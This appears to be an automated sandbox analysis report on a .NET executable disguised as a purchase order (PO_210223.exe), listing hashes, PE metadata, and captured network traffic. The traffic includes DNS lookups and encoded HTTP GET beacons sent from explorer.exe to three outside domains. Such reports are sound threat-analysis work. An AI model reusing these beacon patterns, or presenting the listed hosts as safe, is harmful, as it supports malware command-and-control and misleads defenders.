TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	PO_210223.exe
File size:	802304
MD5:	e40af9745e938b72d5d860bbc679aebf
SHA1:	d9e750061417b0ca9f933db79c99c12934abbe84
SHA256:	38acc90cd6d33b61b99cca8cf06781e1bd2ab8ffebc3a33e036eca36037d413b
SHA512:	2124a0cb2135bfc5731554aaa534e6ba9063137450e5df18a56c8dd661d8d926278c1d658f1aef44d3522598e047f4735ca5a06cef41be3593101a089f3494ba
SSDEEP:	12288:9ORam/OrNbZTlgJqfsRVeh58JtAZUdt4odT9YdxOI/aFOAhIE+TtORqH4O4H1rVR:QFiJNlFfdkP4odidxTCEd2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q4`..............P..*...........I... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4c49ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60345188 [Tue Feb 23 00:51:20 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc4958	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc6000	0xfe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc29b4	0xc2a00	False	0.699083273121	data	7.247286296	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc6000	0xfe8	0x1000	False	0.399658203125	data	5.00156812291	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc8000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc60a0	0x334	data
RT_MANIFEST	0xc63d4	0xc0f	XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	UCOMITypeComp.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	RegisterVB
ProductVersion	1.0.0.0
FileDescription	RegisterVB
OriginalFilename	UCOMITypeComp.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 08:59:45.696063042 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:45.858366966 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:45.858566999 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:45.858961105 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:46.021274090 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.287998915 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.288073063 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.288115978 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.288146973 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.288218975 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.288261890 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.288300037 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.288306952 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:46.288347960 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.288388968 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:46.288444042 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:46.346735954 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:46.369762897 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.370002985 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:46.450568914 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.450594902 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.450609922 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.450627089 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.450850010 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:46.509321928 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.509608984 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 08:59:46.532135963 CET	80	49763	204.11.56.48	192.168.2.4
Feb 23, 2021 08:59:46.532339096 CET	49763	80	192.168.2.4	204.11.56.48
Feb 23, 2021 09:00:04.907589912 CET	49765	80	192.168.2.4	103.66.59.142
Feb 23, 2021 09:00:05.238830090 CET	80	49765	103.66.59.142	192.168.2.4
Feb 23, 2021 09:00:05.239036083 CET	49765	80	192.168.2.4	103.66.59.142
Feb 23, 2021 09:00:05.239259958 CET	49765	80	192.168.2.4	103.66.59.142
Feb 23, 2021 09:00:05.567799091 CET	80	49765	103.66.59.142	192.168.2.4
Feb 23, 2021 09:00:05.594891071 CET	80	49765	103.66.59.142	192.168.2.4
Feb 23, 2021 09:00:05.594916105 CET	80	49765	103.66.59.142	192.168.2.4
Feb 23, 2021 09:00:05.595118046 CET	49765	80	192.168.2.4	103.66.59.142
Feb 23, 2021 09:00:05.595191956 CET	49765	80	192.168.2.4	103.66.59.142
Feb 23, 2021 09:00:05.925678968 CET	80	49765	103.66.59.142	192.168.2.4
Feb 23, 2021 09:00:25.861310005 CET	49767	80	192.168.2.4	23.229.197.103
Feb 23, 2021 09:00:26.050574064 CET	80	49767	23.229.197.103	192.168.2.4
Feb 23, 2021 09:00:26.050730944 CET	49767	80	192.168.2.4	23.229.197.103
Feb 23, 2021 09:00:26.050930977 CET	49767	80	192.168.2.4	23.229.197.103
Feb 23, 2021 09:00:26.240051985 CET	80	49767	23.229.197.103	192.168.2.4
Feb 23, 2021 09:00:26.258440971 CET	80	49767	23.229.197.103	192.168.2.4
Feb 23, 2021 09:00:26.258481979 CET	80	49767	23.229.197.103	192.168.2.4
Feb 23, 2021 09:00:26.258781910 CET	49767	80	192.168.2.4	23.229.197.103
Feb 23, 2021 09:00:26.258807898 CET	49767	80	192.168.2.4	23.229.197.103
Feb 23, 2021 09:00:26.447956085 CET	80	49767	23.229.197.103	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 08:58:18.862360001 CET	53723	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:18.898766994 CET	64646	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:18.911287069 CET	53	53723	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:18.947359085 CET	53	64646	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:19.170614958 CET	65298	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:19.219403028 CET	53	65298	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:20.837881088 CET	59123	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:20.886643887 CET	53	59123	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:21.803251982 CET	54531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:21.854785919 CET	53	54531	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:22.494116068 CET	49714	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:22.552618027 CET	53	49714	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:22.623030901 CET	58028	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:22.671576977 CET	53	58028	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:23.635773897 CET	53097	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:23.687556028 CET	53	53097	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:24.639569044 CET	49257	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:24.688286066 CET	53	49257	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:48.091200113 CET	62389	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:48.142822027 CET	53	62389	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:49.042687893 CET	49910	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:49.099924088 CET	53	49910	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:49.917707920 CET	55854	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:49.969238997 CET	53	55854	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:51.016117096 CET	64549	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:51.067745924 CET	53	64549	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:51.809954882 CET	63153	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:51.858937025 CET	53	63153	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:52.633148909 CET	52991	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:52.682436943 CET	53	52991	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:53.913933992 CET	53700	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:53.965698004 CET	53	53700	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:54.282479048 CET	51726	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:54.334002972 CET	53	51726	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:54.747322083 CET	56794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:54.795957088 CET	53	56794	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:55.957005024 CET	56534	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:56.026484013 CET	53	56534	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:57.354686975 CET	56627	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:57.406266928 CET	53	56627	8.8.8.8	192.168.2.4
Feb 23, 2021 08:58:59.442359924 CET	56621	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:58:59.491060972 CET	53	56621	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:00.320329905 CET	63116	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:00.377401114 CET	53	63116	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:09.531554937 CET	64078	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:09.596590042 CET	53	64078	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:15.546408892 CET	64801	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:15.595046043 CET	53	64801	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:23.286400080 CET	61721	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:23.353519917 CET	53	61721	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:24.241563082 CET	51255	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:24.301482916 CET	53	51255	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:25.089857101 CET	61522	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:25.173163891 CET	53	61522	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:25.749360085 CET	52337	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:25.809186935 CET	53	52337	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:26.346574068 CET	55046	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:26.403739929 CET	53	55046	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:27.002182961 CET	49612	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:27.021836042 CET	49285	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:27.059883118 CET	53	49612	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:27.086724043 CET	53	49285	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:27.706384897 CET	50601	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:27.763459921 CET	53	50601	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:28.665956974 CET	60875	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:28.736999035 CET	53	60875	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:29.677529097 CET	56448	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:29.734661102 CET	53	56448	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:30.280334949 CET	59172	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:30.337259054 CET	53	59172	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:35.141000032 CET	62420	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:35.201513052 CET	53	62420	8.8.8.8	192.168.2.4
Feb 23, 2021 08:59:45.485291004 CET	60579	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:59:45.687182903 CET	53	60579	8.8.8.8	192.168.2.4
Feb 23, 2021 09:00:03.621087074 CET	50183	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:00:03.671164989 CET	53	50183	8.8.8.8	192.168.2.4
Feb 23, 2021 09:00:04.547594070 CET	61531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:00:04.906436920 CET	53	61531	8.8.8.8	192.168.2.4
Feb 23, 2021 09:00:05.773307085 CET	49228	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:00:05.838593006 CET	53	49228	8.8.8.8	192.168.2.4
Feb 23, 2021 09:00:25.798266888 CET	59794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 09:00:25.860059977 CET	53	59794	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 08:59:45.485291004 CET	192.168.2.4	8.8.8.8	0x34c5	Standard query (0)	www.pophazard.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:00:04.547594070 CET	192.168.2.4	8.8.8.8	0xb733	Standard query (0)	www.246835.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:00:25.798266888 CET	192.168.2.4	8.8.8.8	0x8902	Standard query (0)	www.kaieteurny.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 08:59:45.687182903 CET	8.8.8.8	192.168.2.4	0x34c5	No error (0)	www.pophazard.com		204.11.56.48	A (IP address)	IN (0x0001)
Feb 23, 2021 09:00:04.906436920 CET	8.8.8.8	192.168.2.4	0xb733	No error (0)	www.246835.com	sll.nnu.pw		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:00:04.906436920 CET	8.8.8.8	192.168.2.4	0xb733	No error (0)	sll.nnu.pw		103.66.59.142	A (IP address)	IN (0x0001)
Feb 23, 2021 09:00:25.860059977 CET	8.8.8.8	192.168.2.4	0x8902	No error (0)	www.kaieteurny.com	kaieteurny.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:00:25.860059977 CET	8.8.8.8	192.168.2.4	0x8902	No error (0)	kaieteurny.com		23.229.197.103	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.pophazard.com

www.246835.com

www.kaieteurny.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49763	204.11.56.48	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:59:45.858961105 CET	6811	OUT	GET /ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb HTTP/1.1 Host: www.pophazard.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:59:46.287998915 CET	6813	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 07:59:45 GMT Server: Apache Set-Cookie: vsid=918vr3616127860534399; expires=Sun, 22-Feb-2026 07:59:46 GMT; Max-Age=157680000; path=/; domain=www.pophazard.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_F6FX+ZNnJXLKTmtoz4Zbn33M3dcgDySmD+TZLM31TPXG44ciXETJu/O4ZJisipBqiF85zsahUw0ArWA/pDFCdw== Keep-Alive: timeout=5, max=112 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 35 62 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 70 68 61 7a 61 72 64 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 70 68 61 7a 61 72 64 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 70 68 61 7a 61 72 64 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 61 47 34 32 51 58 64 4c 5a 45 70 78 56 44 52 35 59 32 52 71 4e 55 74 42 62 6e 49 76 61 55 4e 4e 61 57 4a 56 64 45 56 51 56 6a 6c 4a 4d 55 78 56 52 32 64 77 57 46 46 45 53 48 64 4b 56 32 56 6c 61 44 46 33 54 6a 68 30 56 6b 74 6e 5a 45 70 4d 64 6b 52 6c 4b 32 35 47 61 30 52 42 4e 48 46 72 4c 31 64 61 61 55 70 49 4d 54 56 5a 4f 55 31 50 53 30 64 6e 4d 45 31 58 57 6c 6c 36 57 6b 56 6b 52 56 55 78 54 32 39 58 62 48 52 56 53 6c 55 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75 Data Ascii: 5b93<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.pophazard.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.pophazard.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwWFFESHdKV2VlaDF3Tjh0VktnZEpMdkRlK25Ga0RBNHFrL1daaUpIMTVZOU1PS0dnME1XWll6WkVkRVUxT29XbHRVSlU9&b="+abp;document.body.appendChild(imglog);if(typeof abperu
Feb 23, 2021 08:59:46.288073063 CET	6814	IN	Data Raw: 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d 3c 2f 73 63 Data Ascii: rl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='pophazard.com' d='entity_mapped'" /><title>Pophazard.com</title><meta http-equiv="Content-Type" content=
Feb 23, 2021 08:59:46.288115978 CET	6815	IN	Data Raw: 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 75 62 75 6e 74 75 2d 62 2f 75 62 75 6e 74 75 2d 62 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d 69 6d 61 67 65 Data Ascii: m/__media__/fonts/ubuntu-b/ubuntu-b.woff") format("woff"),url("http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2") format("woff2"),url("http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf") format("truetype"),url("http:
Feb 23, 2021 08:59:46.288146973 CET	6817	IN	Data Raw: 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 70 69 63 73 2f 31 32 34 37 31 2f 6b 77 62 67 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 Data Ascii: 5px;background: url(http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg) no-repeat center center;background-size: cover}.popular-searches ul.first{ list-style: none;width: 380px;margin:0 auto;}.popular-searches ul.last, .related-searche
Feb 23, 2021 08:59:46.288218975 CET	6818	IN	Data Raw: 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 Data Ascii: : break-word;font-size: 24px;color: #ffffff;font-family: Arial, Helvetica, sans-serif; display:block;background:url(http://i3.cdn-image.com/__media__/pics/12471/logo.png) no-repeat left center; font-weight: bold; padding: 15px 0px 15px 65px;di
Feb 23, 2021 08:59:46.288261890 CET	6819	IN	Data Raw: 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 7d 0d 0a 0d 0a 2e 73 72 63 68 42 74 6e 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 32 35 32 38 61 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69 33 Data Ascii: s:0;border-radius:0;color: #ffffff}.srchBtn {background: #22528a url(http://i3.cdn-image.com/__media__/pics/12471/search-icon.png) no-repeat center center; border: none; color: #fff; cursor: pointer; float: right; font-size: 14px; height:
Feb 23, 2021 08:59:46.288300037 CET	6821	IN	Data Raw: 3a 20 33 30 70 78 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 6c 69 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 35 70 78 7d 0d 0a 64 69 76 2e 73 65 61 72 63 68 2d 66 6f Data Ascii: : 30px}.popular-searches li {margin-bottom: 0px;margin-top: 15px}div.search-form{width: 300px} .srchTxt{width: 250px;font-size: 16px;line-height: 20px} .website .domain{font-size: 23px;padding-top: 19px} .footer-related li{p
